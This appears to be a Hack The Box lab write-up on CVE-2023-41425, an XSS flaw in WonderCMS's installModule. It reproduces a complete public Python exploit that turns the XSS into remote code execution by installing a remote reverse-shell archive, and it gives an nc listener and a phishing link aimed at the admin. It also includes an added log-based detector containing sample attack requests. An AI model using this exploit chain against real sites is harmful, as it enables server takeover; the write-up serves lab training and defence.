CVE-2023-41425


A vulnerability was found in Wonder CMS up to 3.4.2 (Content Management System). It has been classified as problematic. Affected is some unknown processing of the component installModule. The manipulation with an unknown input leads to a cross site scripting vulnerability. CWE is classifying the issue as CWE-79. The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. This is going to have an impact on integrity.

Exploit


Exploit found online

# Author: prodigiousMind
# Exploit: Wondercms 4.3.2 XSS to RCE
 
 
import sys
import requests
import os
import bs4
 
if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")
else:
  data = '''
var url = "'''+str(sys.argv[1])+'''";
if (url.endsWith("/")) {
 url = url.slice(0, -1);
}
var urlWithoutLog = url.split("/").slice(0, -1).join("/");
var urlWithoutLogBase = new URL(urlWithoutLog).pathname; 
var token = document.querySelectorAll('[name="token"]')[0].value;
var urlRev = urlWithoutLogBase+"/?installModule=https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=" + token;
var xhr3 = new XMLHttpRequest();
xhr3.withCredentials = true;
xhr3.open("GET", urlRev);
xhr3.send();
xhr3.onload = function() {
 if (xhr3.status == 200) {
   var xhr4 = new XMLHttpRequest();
   xhr4.withCredentials = true;
   xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");
   xhr4.send();
   xhr4.onload = function() {
     if (xhr4.status == 200) {
       var ip = "'''+str(sys.argv[2])+'''";
       var port = "'''+str(sys.argv[3])+'''";
       var xhr5 = new XMLHttpRequest();
       xhr5.withCredentials = true;
       xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);
       xhr5.send();
       
     }
   };
 }
};
'''
  try:
    open("xss.js","w").write(data)
    print("[+] xss.js is created")
    print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))
    print("----------------------------\n")
    XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""
    XSSlink = XSSlink.strip(" ")
    print("send the below link to admin:\n\n----------------------------\n"+XSSlink)
    print("----------------------------\n")
 
    print("\nstarting HTTP server to allow the access to xss.js")
    os.system("python3 -m http.server\n")
  except: print(data,"\n","//write this to a file")

The exploit works by abusing the installModule feature. It generates a JavaScript file for the XSS payload, xss.js; once that script is executed, it makes the target download an archive file containing a reverse shell script from a remote location: https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip
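From the defender's side, the chain above leaves three distinct request stages in the web server access log: the reflected XSS link, the installModule call pointing at an external archive, and the direct request to the dropped PHP file. The detector below is an added example and is not part of the original write-up or the exploit author's code; the log lines are constructed, and the trusted-source allowlist is an assumption to adapt per site.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed allowlist of module sources an admin actually installs from; adjust per site.
TRUSTED_MODULE_PREFIXES = ("https://github.com/robiso/",)

# Combined/common log format: client, timestamp, request line. Status and size are ignored.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')
# A PHP file requested directly under themes/ or plugins/ (heuristic: themes are included, not browsed).
THEME_PHP_RE = re.compile(r"^/(themes|plugins)/[^/]+/.+\.php$")

# Constructed sample log: one attacker (10.0.0.5) running the three stages, then benign traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Sep/2024:10:00:01 +0000] "GET /index.php?page=loginURL?%22%3E%3C/form%3E%3Cscript+src=%22http://10.0.0.9:8000/xss.js%22%3E%3C/script%3E%3Cform+action=%22 HTTP/1.1" 200 512
10.0.0.5 - - [03/Sep/2024:10:00:05 +0000] "GET /?installModule=https://github.com/example/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=abc HTTP/1.1" 200 312
10.0.0.5 - - [03/Sep/2024:10:00:07 +0000] "GET /themes/revshell-main/rev.php?lhost=10.0.0.9&lport=5252 HTTP/1.1" 200 0
10.0.0.7 - - [03/Sep/2024:10:01:00 +0000] "GET /?installModule=https://github.com/robiso/some-theme/archive/main.zip&directoryName=some-theme&type=themes&token=def HTTP/1.1" 200 312
10.0.0.8 - - [03/Sep/2024:10:02:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048
"""

def classify_request(target):
    """Return the indicator names a single request target trips (empty list if none)."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values, '+' -> space
    hits = []
    # Stage 1: the page parameter closes the login form and injects a script tag.
    page = query.get("page", [""])[0].lower()
    if "<script" in page or "</form>" in page:
        hits.append("reflected-xss-attempt")
    # Stage 2: installModule pointed at an archive outside the trusted allowlist.
    for src in query.get("installModule", []):
        if not src.startswith(TRUSTED_MODULE_PREFIXES):
            hits.append("untrusted-module-install")
    # Stage 3: the freshly installed "theme" is executed by requesting its PHP file directly.
    if THEME_PHP_RE.match(parts.path):
        hits.append("direct-theme-php-request")
    return hits

def scan_access_log(text):
    """Yield (client_ip, indicator, request_target) for every suspicious request in the log."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access log line; skip rather than crash
        ip, _method, target = m.groups()
        findings.extend((ip, hit, target) for hit in classify_request(target))
    return findings
```

Seeing all three indicators from one client within a short window is the strongest signal; an untrusted installModule alone is worth reviewing because the feature legitimately only needs the project's own module sources.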

Modification


Since the target system does not have access to the public internet, it will not be able to fetch the reverse shell script from the remote location, so I would need to modify the exploit script.

┌──(kali㉿kali)-[~/…/htb/labs/sea/CVE-2023-41425]
└─$ wget -q https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip

I will first download the archive containing the reverse shell from the remote location.

┌──(kali㉿kali)-[~/…/htb/labs/sea/CVE-2023-41425]
└─$ 7z l main.zip               
 
7-Zip 24.07 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-06-19
 64-bit locale=C.UTF-8 Threads:128 OPEN_MAX:1024
 
Scanning the drive for archives:
1 file, 2680 bytes (3 KiB)
 
Listing archive: main.zip
 
--
Path = main.zip
Type = zip
Physical Size = 2680
Comment = 1f1a52393d8a6ff6c27e56d958c6d0ee45e7a37f
 
   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2023-08-02 18:44:09 D....            0            0  revshell-main
2023-08-02 18:44:09 .....         5736         2360  revshell-main/rev.php
------------------- ----- ------------ ------------  ------------------------
2023-08-02 18:44:09               5736         2360  1 files, 1 folders

The main.zip file contains a PHP reverse shell: revshell-main/rev.php

I will host main.zip on Kali and modify the URL in the exploit to point to Kali on port 8081.